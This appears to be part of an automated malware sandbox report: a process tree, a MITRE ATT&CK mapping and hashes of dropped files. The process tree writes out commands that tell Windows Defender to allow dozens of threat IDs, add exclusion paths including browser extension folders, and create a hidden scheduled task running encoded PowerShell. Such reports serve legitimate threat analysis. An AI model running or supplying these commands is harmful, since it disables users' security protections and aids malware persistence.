    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5224
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5820
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2196
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5900
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5172
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4004
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IYgGQCIDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IYgGQCIDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SispZMIUHlKkC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SispZMIUHlKkC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VMcfcqZeQaOU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VMcfcqZeQaOU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WUITINsQgCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WUITINsQgCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eHdwxxvqRpTedTcabtR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eHdwxxvqRpTedTcabtR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\xFlMivLSBvkcEEVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\xFlMivLSBvkcEEVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ynivKcrpvjVAAlvE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ynivKcrpvjVAAlvE\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:2596
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IYgGQCIDU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3076
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IYgGQCIDU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4696
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IYgGQCIDU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SispZMIUHlKkC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SispZMIUHlKkC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMcfcqZeQaOU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMcfcqZeQaOU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WUITINsQgCUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WUITINsQgCUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eHdwxxvqRpTedTcabtR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eHdwxxvqRpTedTcabtR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5384
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\xFlMivLSBvkcEEVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\xFlMivLSBvkcEEVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ynivKcrpvjVAAlvE /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ynivKcrpvjVAAlvE /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5552
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gfDZSBGeT" /SC once /ST 09:27:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:4120
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gfDZSBGeT"
  2⤵
  PID:5376

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
PID:5448

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:5720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3168
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:4480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1488

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5312

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:5152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\JEBKECAF

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
480B

MD5
473facbccedd10b4ff5b0be921daffbf

SHA1
9c0117a47b65cd3dea56c3e238d00d21c448c99e

SHA256
07da9b9a0b862df57c897d0068a681c68180bcb63712022b46015078df2cbbed

SHA512
07cbbecc45f39478293f1f958fa05963218605c145a309f2fcdafcb41fe39aef8bc5a12893a0347c5a286eca26d1c1732e1751541a2a368fddfe54e627de870b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
539B

MD5
5aa3c45e6e248c5f06f065a768861e71

SHA1
1d0604d12aed6f4288ed6a2fd394fb87727bc87f

SHA256
e5868e18072d11504d4f017ef626048b77630867830104ff05c718d38c3830bb

SHA512
24dbf9f2aa4dfd49b313a2429fd1c5ae4a95b11f818a293f7d3053c7e2f2675fa28e0675201ba3af450078129c5abbc69f2513ae807f06256f750bc8c6aba6dd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
539B

MD5
5f74d9d6c7b410ea005352621f08b9af

SHA1
e66c799a0eeb3614ff67a09a8a3695cf9c495b6c

SHA256
f94cfe2424fc19727107e47ca99d26729f4d1376098e9545758fb2d45147562a

SHA512
0ee2534d619c43e989d9f4463cd3b45f9be1562f79c55cc4620bdf14150301e191f2787a6bf564c3b6478b5450f2686cdc489f6db27dc7abc7c702d155d06c41

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
539B

MD5
29236dbf545e5df04da2794bfc6fb2bd

SHA1
c4de0f4994a837351a8ccd54d29aa79317ac25a6

SHA256
689315b46c51bb839ac619dee53e55a65bc24a91a82b9b355d36b32efdc4c6fa

SHA512
535e3cf0e2555020b1d00f3b64afc96b5ea2f3ad1694e977b9f0a2f984e24f2df41a46c0c5edc24c14f5013cef76f304b466992dcdca985692241b67e34f8d34

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
04f11c67fe754907a0d0108176fbc6b4

SHA1
3f252995170e35f5be0518d2b9350b710116b466

SHA256
dd77a08bbaaf383db7d9eadd54e1ea1e1d1ea2b6abf571ebc3911581c195f099

SHA512
ffd1c65c15e223996034627331603d9122d128a7abdbeabbfdeebf78608e0cf57c41990bc40f2b4ec115d742a6623d6ff1d05d8a2d5d3c87d8e91d2847f6cbb2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\ad09d587-f37d-41cf-a486-4441ac40ca9e.tmp

Filesize
6KB

MD5
a7c2afe8bbce6751595a14fd007b5e52

SHA1
b9a74edeeef4ea122172fb9518b8b1124bd4ab30

SHA256
4da7919dafd093499f86a74aa4392c3741b286b815e798725090ccfca8d3c97d

SHA512
4f3f8286acea33f7cd8b15b194e6b0575c6c870480cb714d33c5f8ae466cffaa8d91aaad1229b3a45dd22c4d4983f32645579ef6e9d19af556a5c39888dd44f7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
260KB

MD5
312f4bd07ef8358acf0911bf35736dfd

SHA1
745469a9a7eb576748259127b40e8e64e8e23981

SHA256
6de07b6beeb1d3b3cfe2e972be519bd4457be14ef9a57da8a842f7d40af88ba9

SHA512
aab04304eb812af942e9860b99f523ca0410a60c6efa6c132faa2f8e66295065ffc0afb536b51f1aa58198bed6f6e33e9b9f54f048299efd09772fb0bffcb571

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092244261\additional_file0.tmp

Filesize
2.5MB

MD5
20d293b9bf23403179ca48086ba88867

SHA1
dedf311108f607a387d486d812514a2defbd1b9e

SHA256
fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348

SHA512
5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092244261\opera_package

Filesize
103.9MB

MD5
f9172d1f7a8316c593bdddc47f403b06

SHA1
ed1e5a40b040af2c60ed6c2536b3bf7ee55e0e52

SHA256
473f0d4b886db8cd39b900b92bdc0625a3fcec8addd43f71179696bdf186ec3b

SHA512
f51ab2bdf29ca6839e4f7cf1fac1bdfc03ba2da4569a8f21e5d2ee13e6519097c3da40bf0b4ca7642286ed033d0126bbd14ef7842eb9f2db1d6e503849521b02

Download Submit
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe

Filesize
1.9MB

MD5
5d4f53ab1cf64d5e32b87c37aebcdc3c

SHA1
803618a4f5d22fff34727c647053a773ef13a614

SHA256
4bc9589717c9638214386fa4febb05d512130f1ea4fa45dfe4b19e793ec8349e

SHA512
69a694a35401ee5bfcb3a3d34090efb0f46e53540c3a59bfc1e5584579b1e66e4e64f9c595c6940c031c0936ddb2fbea77bdac304f7039ca3c9f1bd710da92d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000042001\e763ecc4e7.exe

Filesize
2.2MB

MD5
8d449a7628ca55419a62364f8e1be1a0

SHA1
2549c6ca6357b18f4ca794448a054b39afad4827

SHA256
fd13d7cf78df7c365f1780276669ab4cc6cbad531f9cdc60d1dcb4e9eec70801

SHA512
33ff7ae8dd0711c8309730d40b6d69f84f75ccc5e6e9626cee6ba317bb409cd176ecfe93a13ec43ff94653707fa28dc66eed53a9bb3870915d427388a1c2b7bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000049001\amert.exe

Filesize
1.8MB

MD5
8d85566c58ad4afea97ae742e5286a1a

SHA1
b49283982508b4db081825a22fd7d97c7c97b3a4

SHA256
0af7203b220761cde1e65317b69e6e6304202fbb3ac0006cb3e3fdc23ef232f2

SHA512
c8f07d75a1aafacf813ee0e4d2e9aaff2a32a3577286ea27f3bad1e0bdf69ff649af7923c2bda90235edfcef3a291fc8cd15ae35ca76a4ffc89cf8cfa99f58b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000051001\844b18c601.exe

Filesize
1.1MB

MD5
de0d994c960dd02f1082bd95dc037451

SHA1
e019cd20190233de78175d23ac8f756de0326734

SHA256
b39a510ca6f284db9d313a4020eddd51e76bd6a5db5b8af158d04649f3d926f1

SHA512
caf7077e26f0f5006fcd093f1f3ef58a08bc55dd1271c45940a83fe2bb127ede1f6c0f4e4a7ebc9c7b5479276c8e0169272865228050adef463f55b3c9788640

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000985001\alexxxxxxxx.exe

Filesize
1.7MB

MD5
85a15f080b09acace350ab30460c8996

SHA1
3fc515e60e4cfa5b3321f04a96c7fb463e4b9d02

SHA256
